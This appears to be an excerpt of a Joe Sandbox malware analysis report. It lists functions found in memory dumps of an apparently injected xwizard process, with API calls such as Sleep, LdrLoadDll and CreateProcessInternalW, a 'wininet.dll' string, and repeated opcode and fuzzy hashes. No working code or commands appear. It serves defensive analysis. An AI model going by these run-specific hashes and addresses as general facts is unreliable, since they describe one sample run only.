                                                                                      • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                      Function 047D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                      • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                      • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                      • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                      Function 047D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                      • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                      • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                      • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                      Function 047D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                      • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                      • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                      • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                      Function 047D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                      • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                      • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                      • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                      Function 047D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                      • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                      • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                      • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                      Function 047D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                      • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                      • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                      • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                      Function 047D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                      • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                      • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                      • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                      Function 047D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                      • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                      • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                      • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                      Function 047D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                      • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                      • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                      • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                      Function 047D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                      • Instruction ID: 4fb0b8e2b17bc898ec493d8bfad1a16aaee50c1a4172d484c326bd67c3373b2d
                                                                                      • Opcode Fuzzy Hash: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                      • Instruction Fuzzy Hash: 84900225221400022155B559060451B04459BDA355396C125F14176B0CC621D9656322
                                                                                      Function 047D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                      • Instruction ID: 1261eb02577ab0633d2fa8567f1c2c4390e6b65ab731f0e44b1ba60622b784aa
                                                                                      • Opcode Fuzzy Hash: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                      • Instruction Fuzzy Hash: E4900225211400032115B559070451700468BD9355356C131F1016670CD621D9616122
                                                                                      Function 047D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                      • Instruction ID: 7ad64ad574930a4fbcf3af8c3b4868c2c56b3d067bdda7f8c8bcb15689b3f2f4
                                                                                      • Opcode Fuzzy Hash: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                      • Instruction Fuzzy Hash: C790026120240003611571594414626400A8BE4205B56C131E10156B0DC525D9917126
                                                                                      Function 047D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                      • Instruction ID: 40a357caa876bce63e6d5abd034ff4d334ae43aca5432d5f7b8d7c6c32fb30e5
                                                                                      • Opcode Fuzzy Hash: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                      • Instruction Fuzzy Hash: 5090023120140802F1907159440465A00058BD5305F96C125A0026774DCA15DB5977A2
                                                                                      Function 047D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                      • Instruction ID: 14939f167b7b97de3cf98cb3449565c9c7e56ea35f78308868d7f592f689b348
                                                                                      • Opcode Fuzzy Hash: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                      • Instruction Fuzzy Hash: C390023120544842F15071594404A5600158BD4309F56C121A00657B4D9625DE55B662
                                                                                      Function 047D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                      • Instruction ID: ac75f257a34c22d4a6171dbf559f225aacfbfdb71b8b9f178c36cad7fe494f79
                                                                                      • Opcode Fuzzy Hash: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                      • Instruction Fuzzy Hash: B090023160540802F1607159441475600058BD4305F56C121A0025774D8755DB5576A2
                                                                                      Function 047D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                      • Instruction ID: ff43bdba3fd9e5af0560bbfcd333e4d786c9f9c0880c4cd5fccf892a08cc290a
                                                                                      • Opcode Fuzzy Hash: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                      • Instruction Fuzzy Hash: 2990023160550402F1107159451471610058BD4205F66C521A0425678D8795DA5175A3
                                                                                      Function 047D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                      • Instruction ID: d512a95988a22c97c3bb30587de03a456fc8ea7c3ba967406f3121c93ffd84c5
                                                                                      • Opcode Fuzzy Hash: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                      • Instruction Fuzzy Hash: 0190022124545102F160715D44046264005ABE4205F56C131A08156B4D8555D9557222
                                                                                      Function 028C3CC0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 773 28c3cc0-28c3d08 call 28cb590 776 28c3d0e-28c3d84 call 28cb660 call 28b47f0 call 28a1410 call 28c1e20 773->776 777 28c3e14-28c3e1a 773->777 786 28c3d90-28c3da4 Sleep 776->786 787 28c3e05-28c3e0c 786->787 788 28c3da6-28c3db8 786->788 787->786 791 28c3e0e 787->791 789 28c3dda-28c3df3 call 28c6220 788->789 790 28c3dba-28c3dd8 call 28c6180 788->790 795 28c3df8-28c3dfb 789->795 790->795 791->777 795->787
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 028C3D9B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: b0873736ae6547ee17a548aa2fcc739d0f9b1941c7d74cbc78a2a002a75c7ed7
                                                                                      • Instruction ID: cdae13cfa75faff24f974afce41cb9499517fd54c957e7fbc22a08aab9d90613
                                                                                      • Opcode Fuzzy Hash: b0873736ae6547ee17a548aa2fcc739d0f9b1941c7d74cbc78a2a002a75c7ed7
                                                                                      • Instruction Fuzzy Hash: B631BEB9600305BBD714DFA4CC84FEBBBB9FB88704F10855CE619AB241D770AA41CBA1
                                                                                      Function 028BF719 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 3442037557-2016760708
                                                                                      • Opcode ID: 255fcefb9c0a7a0c149adeb7328f190856819378c15b173e81980cc2ee230dd5
                                                                                      • Instruction ID: 9fc594ad4eaa2738a5a219131f62e923b6b091c8d15d49ed4e3e672bf485f387
                                                                                      • Opcode Fuzzy Hash: 255fcefb9c0a7a0c149adeb7328f190856819378c15b173e81980cc2ee230dd5
                                                                                      • Instruction Fuzzy Hash: 093130B9A006099FDB00DFD8DC809EEB7B9BF88304B108559F515EB714D771EA058BA0
                                                                                      Function 028BF720 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 3442037557-2016760708
                                                                                      • Opcode ID: 8a0cc388e40a77631f75f6d4c66e28c2ed87a66db4911bd98084b488137d002a
                                                                                      • Instruction ID: c8058fd2e286894ec63862a68b0b86552aaa06cc5547d349e96bf283d3ee8e73
                                                                                      • Opcode Fuzzy Hash: 8a0cc388e40a77631f75f6d4c66e28c2ed87a66db4911bd98084b488137d002a
                                                                                      • Instruction Fuzzy Hash: 42311EB9A0060A9FDB10DFD8DC809EFB7B9BF88304B108559E615EB714D775EA058BA0
                                                                                      Function 028B47F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028B4862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 22ac8f701397e19bd6698c4ff77bd0776cc9e0c348b803c691240d927ae82888
                                                                                      • Instruction ID: 690ae11ee19fa0549ad9fd575ef792b7a23743a16b8f1859b52825028c295eed
                                                                                      • Opcode Fuzzy Hash: 22ac8f701397e19bd6698c4ff77bd0776cc9e0c348b803c691240d927ae82888
                                                                                      • Instruction Fuzzy Hash: 70014CBDD0024DABDF10DAA4DC42FDEB3B99B44308F1041A9A90CE7241F631EA14CB92
                                                                                      Function 028C99C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,028B856E,00000010,?,?,?,00000044,?,00000010,028B856E,?,?,?), ref: 028C9A23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      • Opcode ID: 3eb738441093531e74b9e09a8c44876baeb28747f7b8b94771cb08daf25436b8
                                                                                      • Instruction ID: 538a8129a7ba04388c651f78f2443acdf650b74d372c25e54689b78085675702
                                                                                      • Opcode Fuzzy Hash: 3eb738441093531e74b9e09a8c44876baeb28747f7b8b94771cb08daf25436b8
